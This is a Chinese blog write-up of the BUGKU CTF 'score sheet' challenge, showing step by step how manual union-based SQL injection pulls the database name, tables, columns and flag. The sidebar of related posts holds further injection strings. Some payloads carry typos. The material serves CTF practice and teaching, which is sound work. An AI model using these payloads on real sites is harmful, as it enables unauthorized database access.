SQL注入:BUGKU成绩单——手动注入实践

最新推荐文章于 2024-01-01 12:30:15 发布
最新推荐文章于 2024-01-01 12:30:15 发布
阅读量542 收藏 1
点赞数 6
分类专栏: CTF 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/W_seventeen/article/details/104315276
版权

在这里插入图片描述
打开题目,对于这种题目大家不要慌,我拿到手就会做,好,大家看好,有对话框我们要第一时间想到是不是存在注入。凯斯旺,我们首先按照作者的提示输入一些数字2
在这里插入图片描述
果然存在注入,我们测试1 and 1=1,1 and 1=2 发现存在sql注入,当确认是sql注入后我们尝试爆出有多少列,确定列数,通过语句 id=-1’ order by 4#发现返回正常,而输入语句id=-1’ order by 5#发现返回错误,因此我们断定拥有4列。接下来我们尝试爆出库名,在这之前我们通过语句 id=-1’ union select 1,2,3,4#来确定每个列是否都回显正常。当我们发现每个列的回显都正常时,我们尝试爆库名!

爆破库名

通过联合查询语句 id=-1’ union select 1,2,3,database()# 可以爆出库名为skctf_flag
在这里插入图片描述

爆表名

爆出库名后,我们继续通过语句 id=-1’ union select 1,2,3,group_concat(table_name) from information _schema.tables where table_schema=databade()# 爆出表名
在这里插入图片描述

爆字段名

继续通过语句 id=-1’ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467# //这里需要通过用16进制绕过
在这里插入图片描述

爆出flag

所有准备工作都做完后,我们得到以下信息,库名:skctf_flag 表名:fl4g,sc 字段名:skctf_flag
开始查询数据 id=-1’ union select 1,2,3,skctf_flag from fl4g# 得到flag
在这里插入图片描述

总结

对于spl注入的手工注入,有了些经验,继续加油把!

W_seventeen
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
防止xss和sql注入:JS特殊字符过滤正则
10-27
防止xss和sql注入:JS特殊字符过滤正则,需要的朋友可以参考一下
Bugku成绩查询:一次简单的SQL注入过程
xhxtalent的博客
10-20 499
1很重要,一般来说在数据库中id不会有等于负数的,所以union联合查找前面部分的是错误的,故就是显示后面的查询内容,不然不会显示后面的查询内容的。一共查询到两个表名,分别是fl4g和sc表,我们需要但是flag,很大概率在fl4g表中,所以优先查询fl4g表的内容。查询到字段名为“skctf_flag”,那么就直接查询该字段的数据就能得到想要的了。and 1=2返回错误了,说明存在注入点的。递增上去,如果页面如果出现了错误,那么字段数就是当前的数字减1。分别输入1,2,3返回的是不同人名的成绩单
BUGKU成绩单(sql)
L1ni01
05-27 108
https://www.cnblogs.com/lzlzzzzzz/p/11681309.html
bugku成绩单sql注入)writeup
热门推荐
xuchen16的博客
09-20 1万+
解法一:手工注入 输入1,2,3分别能查到1,2,3号学生的成绩   SQL注入应该没跑了   输入1'返回异常,输入1'--+返回异常,输入1' #或者1’-- +返回正常,看来过滤了--+   观察,表貌似有四列(名字,Math,English,Chinese),输入1' order by 4#返回正常,输入1' order by 5#返回异常,看来的确是4列   接下来就开始暴库名...
BugKu-web】my-first-sqli
weixin_73625393的博客
10-23 315
2.在这里输入万能密码:admin' or 1=1 --,密码随便填,回车。
bugku成绩单writeup(手动注入sqlmap注入、python盲注详解)
渗透、攻防、CTF、编程
07-01 854
知识点:SQL注入,三种解法手动注入sqlmap注入、python盲注 一、手动注入 手动注入前先理解msysql的系统配置 select 1,database(),version();//查询数据库类型和版本 select * from information_schema.schemata //数据库下的所有库 schema_name='mysql' information_schema信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息,SCHEMATA表:提供了当
SQL注入中绕过 单引号 限制继续注入
10-29
我想不少人都看过一些关于SQL Injection针对SQL Server攻击的文章,都是因为变量过滤不足甚至没有过滤而构造畸形SQL语句注入
高级SQL注入:混淆和绕过.pdf
03-21
高级SQL注入:混淆和绕过.pdf
第四课 web攻防-BugkuCTF【my-first-sqli】
最新发布
weixin_40114827的博客
01-01 1179
my-first-sqli
SQL Injection
weixin_42400722的博客
08-22 2101
摘要 以用户或者外部不可信来源的输入动态构造SQL查询的命令,将可能改变SQL查询语句本来的语义,从而导致执行任意的SQL命令。缺陷描述 SQL injection 错误在以下情况下发生: 1. 数据从一个不可信赖的数据源进入程序。 - 在这种情况下, 静态扫描工具无法确定数据源是否可信赖。 2. 数据用于动态地构造一个 SQL 查询。 示例1以下代...
Bugku sql注入
m0_63253040的博客
07-26 1031
过滤了length,like,information,and,union,select,order,where等等。得到数据库后面因为fuzz后发现过滤了太多字符,所以这里根据。用括号绕过空格,我们发现能用的字符有,or,'得到数据表admin和字段名password后。先万能密码试试看,是不等于的意思。是用字典跑出数据表和字段,这里先跳过。提示这题布尔盲注,先fuzz一波。可以确定这里有布尔盲注。去登录账号是admin。最后利用脚本爆出数据库。得到密码bugctf。进入环境是个登录页面。...
SQL注入分析 手动注入检测 手动注入命令
JoShua 的 水库
11-11 8850
1.判断是否有注入;and 1=1 ;and 1=2    2.初步判断是否是mssql ;and user>0    3.注入参数是字符’and [查询条件] and ’’=’    4.搜索时没过滤参数的’and [查询条件] and ’%25’=’    5.判断数据库系统    ;and (select count(*) from sysobjects)>0 mssql    ;and (select count(*) from msysobjects)>0 access    6.猜数据库 ;an
关于如何伪造本地ip访问服务器
W_seventeen的博客
12-03 6011
BUGKU 管理员系统 首先打开题目发现是管理员登录页面,直接尝试下用户名admin,密码admin,然后放进burp抓包,想尝试暴力破解,结果发现用户名猜对了。尝试找密码,常规f12查看源码,发现了末尾处有典型的base编码加密。 怎么辨别base64编码,通常是A-Z,a-z,0-9,+,/,=。最后通常有0个到2个等号。 我也成功用在线解码器,确实是base64编码,解出test123 然...
burpsuite抓包及密码爆破实践(需要安装包的留言)
W_seventeen的博客
12-02 1364
安装burpsuite 照着视频,网上的教程尝试了好久,结果自己电脑的环境因为之前装Eclipse java的时候装了jdk13,而burpsuite用不了13的,我又费了半天劲又是注册甲骨文账号,又是下载jdk8。(吐槽下我的电脑,现在越来越垃圾了,卡的一比)需要burpsuite安装包的可以留言。 然后在火狐浏览器里面设置网络代理选择手动代理,打开burpsuite,选择代理,选择选项。然后将...
MIME类型绕过漏洞
W_seventeen的博客
02-15 741
MIME: 客户端软件,区分不同种类的数据,例如web浏览器就是通过MIME类型来判断文件是GIF图片,还是可打印的PostScript文件。web服务器使用MIME来说明发送数据的种类, web客户端使用MIME来说明希望接收到的数据种类。 MIME检测原理: 服务端MIME类型检测是通过检查http包的Content-Type字段中的值来判断上传文件是否合法的。 步骤 1.首先在桌面上新建一个...
BUGKU 答案在index里 (文件包含和php伪协议)
W_seventeen的博客
12-05 705
自己很菜,去大佬的博客学习了一把,豁然开朗! https://blog.csdn.net/zpy1998zpy/article/details/80585443 这里主要是自己做一些总结,关于PHP伪协议见连接 https://www.php.net/manual/zh/wrappers.php.php 根据题目要求 我们需要读文件(调用read参数),但是直接文件的话,就直接运行了,我们看不...
BUGKU杂项隐写题
W_seventeen的博客
11-23 521
菜鸟入门篇 BUGKU杂项隐写题## 首先将压缩包打开得到一张图片 然后因为我直接放进拖!,但是没有我想要的结果 然后直接放进Winhex找到
BUGKU点击一百万次(两种方法)
W_seventeen的博客
12-07 439
方法一 老规矩f12,查看源码 <span id="flag"></span> if(clicks >= 1000000){ var form = $('<form action="" method="post">' + '<input type="text" name="click...
spark sql: 操作hbase表——rdd实现sql查询
04-11
可以使用Spark SQL中的HBase数据源,将HBase表加载为DataFrame,然后通过Spark SQL对其进行查询。可以使用以下代码: ``` // 加载HBase表为DataFrame val df = spark.read.format("org.apache.hadoop.hbase.spark")...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值